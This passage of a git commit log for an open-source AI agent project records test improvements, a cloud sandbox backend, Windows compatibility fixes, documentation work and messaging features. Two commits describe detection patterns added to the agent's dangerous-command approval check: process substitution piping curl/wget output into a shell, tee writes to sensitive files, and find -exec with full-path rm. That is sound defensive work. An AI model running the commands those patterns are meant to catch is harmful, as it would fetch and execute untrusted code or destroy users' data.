  - extract_images tests now verify actual URL and alt_text
  - truncate_message verifies content preservation after splitting

cron/test_scheduler.py (1 weak → 0):
  - resolve_origin verifies dict equality, not just existence

cron/test_jobs.py (2 weak → 0 + 4 new tests):
  - Schedule parsing verifies ISO timestamp type
  - Cron expression verifies result is valid datetime string
  - NEW: 4 tests for update_job() (was completely untested)
2026-03-05 18:39:37 -08:00
teknium1
e9f05b3524 test: comprehensive tests for model metadata + firecrawl config
model_metadata tests (61 tests, was 39):
  - Token estimation: concrete value assertions, unicode, tool_call messages,
    vision multimodal content, additive verification
  - Context length resolution: cache-over-API priority, no-base_url skips cache,
    missing context_length key in API response
  - API metadata fetch: canonical_slug aliasing, TTL expiry with time mock,
    stale cache fallback on API failure, malformed JSON resilience
  - Probe tiers: above-max returns 2M, zero returns None
  - Error parsing: Anthropic format ('X > Y maximum'), LM Studio, empty string,
    unreasonably large numbers — also fixed parser to handle Anthropic format
  - Cache: corruption resilience (garbage YAML, wrong structure), value updates,
    special chars in model names

Firecrawl config tests (8 tests, was 4):
  - Singleton caching (core purpose — verified constructor called once)
  - Constructor failure recovery (retry after exception)
  - Return value actually asserted (not just constructor args)
  - Empty string env vars treated as absent
  - Proper setup/teardown for env var isolation
2026-03-05 18:22:39 -08:00
teknium1
e2a834578d refactor: extract clipboard methods + comprehensive tests (37 tests)
Refactored image paste internals for testability:
- Extracted _try_attach_clipboard_image() method (clipboard → state)
- Extracted _build_multimodal_content() method (images → OpenAI format)
- chat() now delegates to these instead of inline logic

Tests organized in 4 levels:
  Level 1 (19 tests): Clipboard module — every platform path with
    realistic subprocess simulation (tools writing files, timeouts,
    empty files, cleanup on failure)
  Level 2 (8 tests): _build_multimodal_content — base64 encoding,
    MIME types (png/jpg/webp/unknown), missing files, multiple images,
    default question for empty text
  Level 3 (5 tests): _try_attach_clipboard_image — state management,
    counter increment/rollback, naming convention, mixed success/failure
  Level 4 (5 tests): Queue routing — tuple unpacking, command detection,
    images-only payloads, text-only payloads
2026-03-05 18:07:53 -08:00
teknium1
ffc752a79e test: improve clipboard tests with realistic scenarios and multimodal coverage
Rewrote clipboard tests from 11 shallow mocks to 21 realistic tests:
- Success paths now simulate tools actually writing files (not pre-created)
- osascript: success with PNG, success with TIFF, extraction-fail cases
- pngpaste: empty file rejection edge case
- Linux: extraction failure cleanup verification
- New TestMultimodalConversion class: base64 encoding, MIME types,
  multiple images, missing file handling, default question fallback
2026-03-05 17:58:06 -08:00
teknium1
399562a7d1 feat: clipboard image paste in CLI (Cmd+V / Ctrl+V)
Copy an image to clipboard (screenshot, browser, etc.) and paste into
the Hermes CLI. The image is saved to ~/.hermes/images/, shown as a
badge above the input ([📎 Image #1]), and sent to the model as a
base64-encoded OpenAI vision multimodal content block.

Implementation:
- hermes_cli/clipboard.py: clean module with platform-specific extraction
  - macOS: pngpaste (if installed) → osascript fallback (always available)
  - Linux: xclip (apt install xclip)
- cli.py: BracketedPaste key handler checks clipboard on every paste,
  image bar widget shows attached images, chat() converts to multimodal
  content format, Ctrl+C clears attachments

Inspired by @m0at's fork (https://github.com/m0at/hermes-agent) which
implemented image paste support for local vision models. Reimplemented
cleanly as a separate module with tests.
2026-03-05 17:55:41 -08:00
teknium1
fec8a0da72 Merge PR #296: fix(cron): close lock_fd on failed flock to prevent fd leak
Authored by alireza78a. When flock() raises on a concurrent tick, the
file descriptor was leaked because the except clause returned without
closing it. Adds lock_fd=None init and close in the except path.
2026-03-05 17:05:06 -08:00
teknium1
9f4542b3db fix: require Python 3.11+ in pyproject.toml
Was incorrectly set to >=3.10. Hermes uses tomllib and other 3.11+
features. CONTRIBUTING.md and README already say 3.11+.
2026-03-05 17:04:08 -08:00
teknium1
363633e2ba fix: allow self-hosted Firecrawl without API key + add self-hosting docs
On top of PR #460: self-hosted Firecrawl instances don't require an API
key (USE_DB_AUTHENTICATION=false), so don't force users to set a dummy
FIRECRAWL_API_KEY when FIRECRAWL_API_URL is set. Also adds a proper
self-hosting section to the configuration docs explaining what you get,
what you lose, and how to set it up (Docker stack, tradeoffs vs cloud).

Added 2 more tests (URL-only without key, neither-set raises).
2026-03-05 16:44:21 -08:00
teknium1
a41ba57a7a Merge PR #460: feat(tools): add support for self-hosted firecrawl
Authored by caentzminger. Adds optional FIRECRAWL_API_URL env var to point
the Firecrawl client at a self-hosted instance instead of the cloud API.
2026-03-05 16:41:30 -08:00
teknium1
884c8ea70a chore: add openai/gpt-5.4 to OpenRouter preferred models list 2026-03-05 16:13:45 -08:00
teknium1
c886333d32 feat: smart context length probing with persistent caching + banner display
Replaces the unsafe 128K fallback for unknown models with a descending
probe strategy (2M → 1M → 512K → 200K → 128K → 64K → 32K). When a
context-length error occurs, the agent steps down tiers and retries.
The discovered limit is cached per model+provider combo in
~/.hermes/context_length_cache.yaml so subsequent sessions skip probing.

Also parses API error messages to extract the actual context limit
(e.g. 'maximum context length is 32768 tokens') for instant resolution.

The CLI banner now displays the context window size next to the model
name (e.g. 'claude-opus-4 · 200K context · Nous Research').

Changes:
- agent/model_metadata.py: CONTEXT_PROBE_TIERS, persistent cache
  (save/load/get), parse_context_limit_from_error(), get_next_probe_tier()
- agent/context_compressor.py: accepts base_url, passes to metadata
- run_agent.py: step-down logic in context error handler, caches on success
- cli.py + hermes_cli/banner.py: context length in welcome banner
- tests: 22 new tests for probing, parsing, and caching

Addresses #132. PR #319's approach (8K default) rejected — too conservative.
2026-03-05 16:09:57 -08:00
teknium1
55b173dd03 refactor: move shutil import to module level
Cleanup on top of PR #305 — replace two inline 'import shutil as _shutil'
with a single module-level import.
2026-03-05 15:57:05 -08:00
dmahan93
9079a27814 fix: prompt box and response box span full terminal width on wide screens
- Replace hardcoded '─' * 200 horizontal rules with Window(char='─')
  so prompt_toolkit fills the entire terminal width automatically
- Use shutil.get_terminal_size().columns instead of Rich Console.width
  for response box, separator line, and input height calculation
  (more reliable inside patch_stdout context)
2026-03-05 15:57:05 -08:00
caentzminger
d7d10b14cd feat(tools): add support for self-hosted firecrawl
Adds optional FIRECRAWL_API_URL environment variable to support
self-hosted Firecrawl deployments alongside the cloud service.

- Add FIRECRAWL_API_URL to optional env vars in hermes_cli/config.py
- Update _get_firecrawl_client() in tools/web_tools.py to accept custom API URL
- Add tests for client initialization with/without URL
- Document new env var in installation and config guides
2026-03-05 16:16:18 -06:00
shitcoinsherpa
81986022b7 Add explicit encoding="utf-8" to all config/data file open() calls
On Windows, open() defaults to the system locale encoding (cp1252,
cp1254, etc.) rather than UTF-8. This breaks any file containing
non-ASCII characters, and also causes crashes when writing JSON with
ensure_ascii=False.

This adds encoding="utf-8" to open() calls in:
- gateway/run.py (config.yaml reads/writes throughout)
- gateway/config.py (gateway.json and config.yaml)
- hermes_cli/config.py (config.yaml load/save)
- hermes_cli/main.py (session export with ensure_ascii=False)
- hermes_cli/status.py (jobs.json and sessions.json)
2026-03-05 17:16:04 -05:00
shitcoinsherpa
dcba291d45 Use pywinpty instead of ptyprocess on Windows for PTY support
ptyprocess depends on Unix-only APIs (fork, openpty) and cannot work
on Windows at all. pywinpty provides a compatible PtyProcess interface
using the Windows ConPTY API.

This conditionally imports winpty.PtyProcess on Windows and
ptyprocess.PtyProcess on Unix. The pyproject.toml pty extra now uses
platform markers so the correct package is installed automatically.
2026-03-05 17:16:04 -05:00
shitcoinsherpa
48e65631f6 Fix auth store file lock for Windows (msvcrt) with reentrancy support
fcntl is not available on Windows. This adds msvcrt.locking as a
fallback for cross-process advisory locking on Windows.

msvcrt.locking is not reentrant within the same thread, unlike fcntl.flock.
This matters because resolve_codex_runtime_credentials holds the lock and
then calls _save_codex_tokens, which tries to acquire it again. Without
reentrancy tracking, this deadlocks on Windows after a 15-second timeout.

Uses threading.local() to track lock depth per thread, allowing nested
acquisitions to pass through without re-acquiring the underlying lock.

Also handles msvcrt-specific requirements: file must be opened in r+ mode
(not a+), must have at least 1 byte of content, and the file pointer must
be at position 0 before locking.
2026-03-05 17:16:03 -05:00
rovle
a6499b6107 fix(daytona): use shell timeout wrapper instead of broken SDK exec timeout
The Daytona SDK's process.exec(timeout=N) parameter is not enforced —
the server-side timeout never fires and the SDK has no client-side
fallback, causing commands to hang indefinitely.

Fix: wrap commands with timeout N sh -c '...' (coreutils) which
reliably kills the process and returns exit code 124. Added
shlex.quote for proper shell escaping and a secondary deadline (timeout + 10s) that force-stops the sandbox if the shell timeout somehow fails.

Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 13:12:41 -08:00
0xbyt4
14a11d24b4 fix: handle None args in build_tool_preview
When an LLM returns null/empty tool call arguments, json.loads()
produces None. build_tool_preview then crashes with
"argument of type 'NoneType' is not iterable" on the `in` check.
Return None early when args is falsy.
2026-03-05 23:09:11 +03:00
rovle
74a36b0729 docs: add Daytona to backend lists in docs
Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 11:55:41 -08:00
rovle
efc7a7b957 fix(daytona): don't guess /root on cwd probe failure, keep constructor default; update tests to reflect this
Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 11:49:35 -08:00
rovle
4f1464b3af fix(daytona): default disk to 10GB to match platform limit
Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 11:37:30 -08:00
rovle
3a41079fac fix(daytona): add optional dependency group to pyproject.toml
Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 11:13:12 -08:00
rovle
5279540bb4 fix(daytona): add missing config mappings in gateway, CLI defaults, and config display
Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 11:12:50 -08:00
rovle
577da79a47 fix(daytona): make disk cap visible and use SDK enum for sandbox
state

- Replace logger.warning with warnings.warn for the disk cap so users
  actually see it (logger was suppressed by CLI's log level config)
- Use SandboxState enum instead of string literals in
_ensure_sandbox_ready

Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 11:03:39 -08:00
rovle
1faa9648d3 chore(daytona): cap the disk size to current maximum on daytona sandboxes
Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 10:43:41 -08:00
PercyDikec
ad57bf1e4b fix(cli): use correct dict key for codex auth file path in status output 2026-03-05 21:27:12 +03:00
rovle
d5efb82c7c test(daytona): add unit and integration tests for Daytona backend
Unit tests cover cwd resolution, sandbox persistence/resume, cleanup,
command execution, resource conversion, interrupt handling, retry
exhaustion, and sandbox readiness checks. Integration tests verify
basic commands, filesystem ops, session persistence, and task
isolation against a live Daytona API.

Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 10:26:22 -08:00
PercyDikec
36214d14db fix(cli): use correct visibility filter string in codex API model fetch 2026-03-05 21:12:53 +03:00
rovle
ea2f7ef2f6 docs(config): add Daytona disk limit hint and fix default cwd in example
Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 10:02:22 -08:00
rovle
435530018b fix(daytona): resolve cwd by detecting home directory inside the sandbox 2026-03-05 10:02:22 -08:00
rovle
df61054a84 feat(cli): add Daytona to setup wizard, doctor, and status display
Add Daytona as a backend choice in the interactive setup wizard with
SDK installation and API key prompts. Show Daytona image in status
output and validate API key + SDK in doctor checks. Add OPTION 6
example in cli-config.yaml.example.

Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 10:02:22 -08:00
rovle
690b8bb563 feat(cli): add Daytona config mapping and env var sync
Wire TERMINAL_DAYTONA_IMAGE through cli.py env_mappings and
hermes_cli/config.py so `hermes config set` propagates correctly.
2026-03-05 10:02:21 -08:00
rovle
c43451a50b feat(terminal): integrate Daytona backend into tool pipeline
Add Daytona to image selection, container_config guards, environment
factory, requirements check, and diagnostics in terminal_tool.py and
file_tools.py. Also add to sandboxed-backend approval bypass.

Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 10:02:21 -08:00
rovle
1e312c6582 feat(environments): add Daytona cloud sandbox backend
New execution backend using the Daytona Python SDK. Supports persistent
sandboxes via stop/start lifecycle, interrupt handling, and automatic
retry on transient errors.

Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 10:02:21 -08:00
PercyDikec
e36c8cd49a fix: add missing re.DOTALL flag to DeepSeek V3 tool call parser 2026-03-05 20:32:38 +03:00
PercyDikec
16cb6d1a6e fix(gateway): return response from /retry handler instead of discarding it 2026-03-05 19:59:54 +03:00
Teknium
21d61bdd71 Merge pull request #307 from batuhankocyigit/patch-1
fix: correct typo 'Grup' -> 'Group' in test section headers
2026-03-05 08:54:05 -08:00
teknium1
ad9c26afb8 Merge PR #293: fix: eliminate shell noise from terminal output and fix test failures
Authored by 0xbyt4. Wraps commands with unique fence markers to isolate real output
from shell init/exit noise (oh-my-zsh, macOS session restore, etc.). Falls back to
expanded pattern-based cleaning. Also fixes BSD find fallback and test module shadowing.
2026-03-05 08:48:26 -08:00
JackTheGit
71c0cd00e5 docs: fix spelling of 'publicly' 2026-03-05 16:46:21 +00:00
teknium1
83f99d8203 Merge PR #438: fix: add missing empty-content guard after think-block stripping in retry path
Authored by PercyDikec. Fixes #437.
The retry path in _handle_max_iterations was missing the second if final_response:
guard after stripping <think> blocks, which could result in an empty assistant message
being appended to history instead of using the fallback message.
2026-03-05 08:37:49 -08:00
teknium1
6b37d38dee Merge PR #292: feat(whatsapp): native media attachments for images, videos and documents
Authored by satelerd. Adds native WhatsApp media sending for images, videos,
and documents via MEDIA: tags. Also includes conflict resolution with edit_message
feature, Telegram hint fix (only advertise supported media types), and import cleanup.
2026-03-05 08:35:13 -08:00
PercyDikec
938499ddfb fix: add missing empty-content guard after think-block stripping in retry path 2026-03-05 18:57:59 +03:00
teknium1
d92266d7c0 ci: pin tests to Python 3.11 only
The installer hardcodes PYTHON_VERSION=3.11 and creates the venv
with that version. No point testing 3.12 — halves CI time.
2026-03-05 07:55:01 -08:00
teknium1
a352b5c193 docs: remove legacy docs/ directory — all content migrated to website
Removed 10 markdown files (~4,200 lines) that have been fully migrated,
restructured, and accuracy-audited on the docs site at
hermes-agent.nousresearch.com/docs/

Left docs/README.md as a pointer to the website.
Updated CONTRIBUTING.md file tree reference.
2026-03-05 07:37:06 -08:00
teknium1
82f7483999 docs: simplify README from 1776 to 121 lines
All detailed documentation now lives at hermes-agent.nousresearch.com/docs/.
README retains: banner, badges, value proposition, feature highlights,
one-line install, getting started commands, docs site link table,
quick contributor setup, community links, and license.

Removed: 1600+ lines of inline docs covering config, messaging setup,
tools, skills, MCP, terminal backends, memory, cron, hooks, security,
TTS, browser, batch processing, RL training, manual installation,
env vars reference, file structure, and troubleshooting.
2026-03-05 07:33:07 -08:00
teknium1
56dc9277d7 ci: add test workflow for PRs and main branch
Run pytest on Python 3.11 + 3.12 for every PR and push to main.

- Uses uv for fast dependency installation
- Excludes integration tests (need real API keys/services)
- Blanks API keys as safety net against accidental real API calls
- Concurrency: cancels in-progress runs when new commits are pushed
- 10 minute timeout (tests take ~77s)
- fail-fast disabled so both Python versions run independently

GitHub's default 'require approval for first-time contributors'
means maintainers approve CI before it runs on new contributors'
PRs, preventing abuse of CI resources.
2026-03-05 07:29:16 -08:00
teknium1
d50e9bcef7 docs: add 11 new pages + expand 4 existing pages (26 → 37 total)
New pages (sourced from actual codebase):
- Security: command approval, DM pairing, container isolation, production checklist
- Session Management: resume, export, prune, search, per-platform tracking
- Context Files: AGENTS.md project context, discovery, size limits, security
- Personality: SOUL.md, 14 built-in personalities, custom definitions
- Browser Automation: Browserbase setup, 10 browser tools, stealth mode
- Image Generation: FLUX 2 Pro via FAL, aspect ratios, auto-upscaling
- Provider Routing: OpenRouter sort/only/ignore/order config
- Honcho: AI-native memory integration, setup, peer config
- Home Assistant: HASS setup, 4 HA tools, WebSocket gateway
- Batch Processing: trajectory generation, dataset format, checkpointing
- RL Training: Atropos/Tinker integration, environments, workflow

Expanded pages:
- code-execution: 51 → 195 lines (examples, limits, security, comparison table)
- delegation: 60 → 216 lines (context tips, batch mode, model override)
- cron: 88 → 273 lines (real-world examples, delivery options, expression cheat sheet)
- memory: 98 → 249 lines (best practices, capacity management, examples)
2026-03-05 07:28:41 -08:00
teknium1
c4e520fd6e docs: add documentation & housekeeping checklist to PR template
Add a second checklist section covering common oversights seen in PRs:
- Update relevant docs (README, docs/, docstrings)
- Update cli-config.yaml.example when adding config keys
- Update CONTRIBUTING.md/AGENTS.md for architecture changes
- Consider cross-platform impact (Windows/macOS)
- Update tool schemas when changing tool behavior

Each item has an 'or N/A' option so contributors aren't blocked
on items that don't apply to their change.
2026-03-05 07:23:52 -08:00
teknium1
30ff395924 feat: add issue and PR templates
Add structured GitHub templates based on analysis of 200+ closed PRs
and 50+ closed issues to improve submission quality:

Issue templates (YAML form-based):
- Bug Report: requires reproduction steps, expected/actual behavior,
  OS/Python/Hermes version. Optional root cause analysis field.
- Feature Request: requires problem/use case, links to skill-vs-tool
  guidance in CONTRIBUTING.md to reduce misguided tool PRs.
- Setup/Installation Help: requires install method, hermes doctor
  output, error logs, steps already tried.
- Template chooser config with links to Discord, docs, contributing guide.

PR template:
- Type of change selector (bug/feature/security/docs/tests/refactor/skill)
- Mandatory issue reference, changes list, testing steps
- Checklist: conventional commits, no duplicates, focused changes,
  tests pass, tests added, platform tested
- Dedicated 'New Skills' section asking if skill is broadly useful
  and properly formatted/tested

Key problems these templates address:
- Bug reports with no reproduction steps or environment info
- Duplicate/racing PRs (multiple people fixing same issue)
- Stale branches with 85+ unrelated file changes
- Junk skill PRs that should go to Skills Hub instead of bundled
- Missing tests on bug fix PRs
- No issue references on PRs
2026-03-05 07:22:39 -08:00
teknium1
f55025952d docs: reorder sidebar — Quickstart before Installation 2026-03-05 07:15:35 -08:00
teknium1
1bc45ee8fe docs: simplify installer description for getting started page 2026-03-05 07:14:13 -08:00
teknium1
19016497ef docs: fix all remaining minor accuracy issues
- updating.md: Note that 'hermes update' auto-handles config migration
- cli.md: Add summary_model to compression config, fix display config
  (add personality/compact), remove unverified pastes/ claim
- configuration.md: Add 5 missing config sections (stt, human_delay,
  code_execution, delegation, clarify), fix display defaults,
  fix reasoning_effort default to empty/unset
- messaging/index.md: Add GATEWAY_ALLOWED_USERS to security section
- skills.md: Add category field to skills_list return value
- mcp.md: Document auto-registered utility tools (resources/prompts)
- architecture.md: Fix file_tools.py reference, base_url default to None,
  synchronous agent loop pseudocode
- cli-commands.md: Fix hermes logout description
- environment-variables.md: Add HERMES_QUIET, HERMES_EXEC_ASK,
  BROWSER_INACTIVITY_TIMEOUT, GATEWAY_ALLOWED_USERS

Verification scan: 27/27 checks passed, zero issues remaining.
2026-03-05 07:00:51 -08:00
teknium1
d578d06f59 docs: comprehensive accuracy audit fixes (35+ corrections)
CRITICAL fixes:
- Installation: Remove false prerequisites (installer auto-installs everything except git)
- Tools: Remove non-existent 'web_crawl' tool from tools table
- Memory: Remove non-existent 'read' action (only add/replace/remove exist)
- Code execution: Fix 'search' to 'search_files' in sandbox tools list
- CLI commands: Fix --model/--provider/--toolsets/--verbose as chat subcommand flags

IMPORTANT fixes:
- Installation: Add missing installer features (Node.js, ripgrep, ffmpeg, skills seeding)
- Installation: Add 6 missing package extras to table (mcp, honcho, tts-premium, etc)
- Installation: Fix mkdir to include all directories the installer creates
- Quickstart: Add OpenAI Codex to provider table
- CLI: Fix all 'hermes --flag' to 'hermes chat --flag' across all docs
- Configuration: Remove non-existent --max-turns CLI flag
- Tools: Fix 'search' to 'search_files', add missing 'process' tool
- Skills: Remove skills_categories() (not a registered tool)
- Cron: Remove unsupported 'daily at 9am' schedule format
- TTS: Fix output directory to ~/.hermes/audio_cache/
- Delegation: Clarify depth limit wording
- Architecture: Fix default model, chat() signature, file names
- Contributing: Fix Python requirement from 3.11+ to 3.10+
- CLI reference: Add missing commands (login, tools, sessions subcommands)
- Env vars: Fix TERMINAL_DOCKER_IMAGE default, add HERMES_MODEL
2026-03-05 06:50:22 -08:00
Farukest
e25ad79d5d fix: use _max_tokens_param in max-iterations retry path
The retry summary in _handle_max_iterations hardcodes max_tokens instead
of calling _max_tokens_param(). For direct OpenAI API users (gpt-4o,
o-series), the correct parameter name is max_completion_tokens. The first
attempt at line 2697 already uses _max_tokens_param correctly but the
retry path at line 2743 was missed.
2026-03-05 17:49:37 +03:00
teknium1
f2624a1426 docs: remove Windows support references, recommend WSL2
- Installation: Remove PowerShell/CMD install commands, add WSL2 warning
- Quickstart: Replace PowerShell block with WSL2 tip
- Contributing: Update cross-platform section to clarify Windows unsupported
- Index: Update install description to say WSL2 instead of Windows
2026-03-05 06:36:18 -08:00
jackx707
15561ec425 feat: add WebResearchEnv RL environment for multi-step web research 2026-03-05 14:34:36 +00:00
teknium1
93d93fdea4 feat: add gateway setup wizard and update steps to landing page
- Step 4: Added 'hermes gateway setup' wizard command before gateway start
- Step 5: New 'hermes update' step for keeping the agent up to date
2026-03-05 06:33:40 -08:00
teknium1
87f4e4cb9b chore: remove Windows install options from landing page
- Remove PowerShell and CMD tabs from hero and install sections
- Add WSL to the Linux/macOS tab label
- Update Windows notice: experimental/unsupported, recommend WSL2
- Add Docs nav link pointing to /docs/
- Clean up platform detection JS (always default to linux)
2026-03-05 06:30:09 -08:00
Farukest
82cb1752d9 fix(whatsapp): replace Linux-only fuser with cross-platform port cleanup
fuser command does not exist on Windows, causing orphaned bridge processes
to never be cleaned up. On crash recovery, the port stays occupied and the
next connect() fails with address-already-in-use.

Add _kill_port_process() helper that uses netstat+taskkill on Windows and
fuser on Linux/macOS. Replace both call sites in connect() and disconnect().
2026-03-05 17:13:14 +03:00
teknium1
ada3713e77 feat: add documentation website (Docusaurus)
- 25 documentation pages covering Getting Started, User Guide, Developer Guide, and Reference
- Docusaurus with custom amber/gold theme matching the landing page branding
- GitHub Actions workflow to deploy landing page + docs to GitHub Pages
- Landing page at root, docs at /docs/ on hermes-agent.nousresearch.com
- Content extracted and restructured from existing repo docs (README, AGENTS.md, CONTRIBUTING.md, docs/)
- Auto-deploy on push to main when website/ or landingpage/ changes
2026-03-05 05:24:55 -08:00
aydnOktay
7d79ce92ac Improve type hints and error diagnostics in vision_tools 2026-03-05 16:11:59 +03:00
teknium1
1708dcd2b2 feat: implement edit_message() for Telegram/Discord/Slack and fix fallback regression
Building on PR #288's edit_message() abstraction:

- Telegram: edit_message_text() with MarkdownV2 + plain text fallback
- Discord: channel.fetch_message() + msg.edit() with length capping
- Slack: chat_update() via slack_bolt client

Also fixes the fallback regression in send_progress_messages() where
platforms that don't support editing would receive duplicated accumulated
tool lines. Now uses a can_edit flag — after the first failed edit, falls
back to sending individual lines (matching pre-PR behavior).
2026-03-05 03:47:51 -08:00
teknium1
5702eba93b Merge PR #288: feat(whatsapp): stream tool progress as a single live-updating message
Authored by satelerd. Adds edit_message() to BasePlatformAdapter and
implements it for WhatsApp via Baileys native editing. Progress messages
accumulate into a single live-updating message instead of N separate ones.

Cherry-picked from stale branch.
2026-03-05 03:44:13 -08:00
Daniel Sateler
a1767fd69c feat(whatsapp): consolidate tool progress into single editable message
Instead of sending a separate WhatsApp message for each tool call during
agent execution (N+1 messages), the first tool sends a new message and
subsequent tools edit it to append their line. Result: 1 growing progress
message + 1 final response = 2 messages instead of N+1.

Changes:
- bridge.js: Add POST /edit endpoint using Baileys message editing
- base.py: Add optional edit_message() to BasePlatformAdapter (no-op
  default, so platforms without editing support work unchanged)
- whatsapp.py: Implement edit_message() calling bridge /edit
- run.py: Rewrite send_progress_messages() to accumulate tool lines and
  edit the progress message. Falls back to sending a new message if
  edit fails (graceful degradation).

Before (5 tools = 6 messages):
  ⚕ Hermes Agent ─── 🔍 web_search... "query"
  ⚕ Hermes Agent ─── 📄 web_extract... "url"
  ⚕ Hermes Agent ─── 💻 terminal... "pip install"
  ⚕ Hermes Agent ─── ✍️ write_file... "app.py"
  ⚕ Hermes Agent ─── 💻 terminal... "python app.py"
  ⚕ Hermes Agent ─── Done! The server is running...

After (5 tools = 2 messages):
  ⚕ Hermes Agent ───
  🔍 web_search... "query"
  📄 web_extract... "url"
  💻 terminal... "pip install"
  ✍️ write_file... "app.py"
  💻 terminal... "python app.py"

  ⚕ Hermes Agent ─── Done! The server is running...

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-05 03:44:08 -08:00
teknium1
b4b426c69d test: add coverage for tee, process substitution, and full-path rm patterns
Tests for the three new dangerous command patterns added in PR #280:
- TestProcessSubstitutionPattern: 7 tests (bash/sh/zsh/ksh + safe commands)
- TestTeePattern: 7 tests (sensitive paths + safe destinations)
- TestFindExecFullPathRm: 4 tests (/bin/rm, /usr/bin/rm, bare rm, safe find)
2026-03-05 01:58:33 -08:00
teknium1
2465674fda Merge PR #280: fix: add missing dangerous command patterns (tee, process substitution, full-path rm)
Authored by dogiladeveloper. Adds detection for tee writes to sensitive files, process substitution with curl/wget, and find -exec with full-path rm.
2026-03-05 01:56:44 -08:00
teknium1
2eca0d4af1 Merge PR #275: fix(batch_runner): preserve traceback when batch worker fails
Authored by batuhankocyigit. Adds explicit traceback logging for batch worker failures and improves tool dispatch error logging in registry.
2026-03-05 01:44:05 -08:00
teknium1
11a7c6b112 fix: update mock agent signature to accept task_id after PR #419
The _Codex401ThenSuccessAgent mock overrides run_conversation() but was
missing the task_id parameter, causing a TypeError in the gateway test.
2026-03-05 01:41:50 -08:00
teknium1
50ea8adf46 Merge PR #419: fix: pass stable task_id in CLI and gateway to preserve sandbox state across turns
Authored by rovle. Passes session_id as task_id to run_conversation()
in both CLI and gateway, so container backends (Docker/Modal/Singularity)
reuse the same sandbox across turns. Also passes task_id through to
_create_environment() in file_tools.py.

Cherry-picked from original PR branch (which had unrelated divergent
commits from the contributor's fork).
2026-03-05 01:40:13 -08:00
rovle
ca33372595 fix: pass task_id to _create_environment as well, to prevent cross-session state mixing
Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 01:40:04 -08:00
rovle
7d47e3b776 fix: pass stable task_id in CLI and gateway to preserve sandbox state across turns
Signed-off-by: rovle <lovre.pesut@gmail.com>
2026-03-05 01:40:04 -08:00
teknium1
fe15a2c65c Merge PR #274: fix(setup): handle TerminalMenu init failures with safe fallback
Authored by jdblackstar. Catches runtime exceptions from TerminalMenu
init (e.g. CalledProcessError from tput with unknown TERM like
xterm-ghostty over SSH) and falls through to the text-based menu.
2026-03-05 01:26:58 -08:00
teknium1
d400fb8b23 feat: add /update slash command for gateway platforms
Adds a /update command to Telegram, Discord, and other gateway platforms
that runs `hermes update` to pull the latest code, update dependencies,
sync skills, and restart the gateway.

Implementation:
- Spawns `hermes update` in a separate systemd scope (systemd-run --user
  --scope) so the process survives the gateway restart that hermes update
  triggers at the end. Falls back to nohup if systemd-run is unavailable.
- Writes a marker file (.update_pending.json) with the originating
  platform and chat_id before spawning the update.
- On gateway startup, _send_update_notification() checks for the marker,
  reads the captured update output, sends the results back to the user,
  and cleans up.

Also:
- Registers /update as a Discord slash command
- Updates README.md, docs/messaging.md, docs/slash-commands.md
- Adds 18 tests covering handler, notification, and edge cases
2026-03-05 01:20:58 -08:00
Dev User
3221818b6e fix: respect OPENAI_BASE_URL when resolving API key priority
When base_url points to a non-OpenRouter endpoint (e.g. Z.ai),
OPENROUTER_API_KEY incorrectly takes priority over OPENAI_API_KEY,
sending the wrong credentials. This causes 401 errors on the main
inference path and forces users to comment out OPENROUTER_API_KEY,
which then breaks auxiliary clients (compression, vision).

Fix: check whether base_url contains "openrouter" and swap the key
priority accordingly. Also adds GLM-4.7 and GLM-5 context lengths
to DEFAULT_CONTEXT_LENGTHS.
2026-03-05 08:25:16 +00:00
teknium1
2af2f148ab refactor: rewrite duckduckgo-search skill for accuracy and usability
Follow-up to PR #267 merge:
- Fix CLI syntax: -k is keywords, -m is max results (was reversed)
- Add clear trigger condition: use only when web_search tool unavailable
- Remove misleading curl fallback (DuckDuckGo Instant Answer API is not
  a web search endpoint)
- Fix package name: ddgs (renamed from duckduckgo-search)
- Add workflow section for search → web_extract pipeline
- Add pitfalls and limitations sections
- Fix author attribution to actual contributor
- Rewrite shell script as simple ddgs wrapper with availability check
2026-03-04 22:11:09 -08:00
teknium1
d19109742e Merge PR #267: feat(skills): add DuckDuckGo search skill as Firecrawl fallback
Authored by gamedevCloudy. Adds a free web search skill for users without
FIRECRAWL_API_KEY, using the ddgs library or curl.
2026-03-04 22:09:07 -08:00
teknium1
078e2e4b19 fix(cli): Ctrl+C clears input buffer before exiting
Previously, pressing Ctrl+C while text was typed in the input prompt
would immediately exit Hermes. Now follows standard shell behavior:

- Text in buffer → Ctrl+C clears the line (like bash)
- Empty buffer → Ctrl+C exits

This means accidentally hitting Ctrl+C while composing a message just
clears the input instead of killing the session. A second Ctrl+C on
the empty prompt still exits as expected.
2026-03-04 22:01:13 -08:00
teknium1
9aa2999388 Merge PR #393: fix(whatsapp): initialize data variable and close log handle on error paths
Authored by FarukEst. Fixes #392.

1. Initialize data={} before health-check loop to prevent NameError when
   resp.json() raises after http_ready is set to True.
2. Extract _close_bridge_log() helper and call on all return False paths
   to prevent file descriptor leaks on failed connection attempts.
   Refactors disconnect() to reuse the same helper.
2026-03-04 21:49:53 -08:00
teknium1
d0d9897e81 refactor: clean up transcription_tools after PR #262 merge
- Fix incorrect error message (only VOICE_TOOLS_OPENAI_KEY is checked,
  not OPENAI_API_KEY)
- Remove redundant FileNotFoundError catch (exists() check above
  already handles this)
- Consolidate openai imports to single line
- Sort SUPPORTED_FORMATS in error message for deterministic output
2026-03-04 21:35:04 -08:00
teknium1
9306a1e06a Merge PR #262: improve error handling and validation in transcription_tools
Authored by aydnOktay. Adds file format and size validation before API calls,
specific exception handling, and improved logging.
2026-03-04 21:33:03 -08:00
teknium1
141b12bd39 refactor: clean up type hints and docstrings in session_search_tool
Follow-up to PR #261 merge:
- Fix Optional[Any] → Union[int, float, str, None] (actually meaningful)
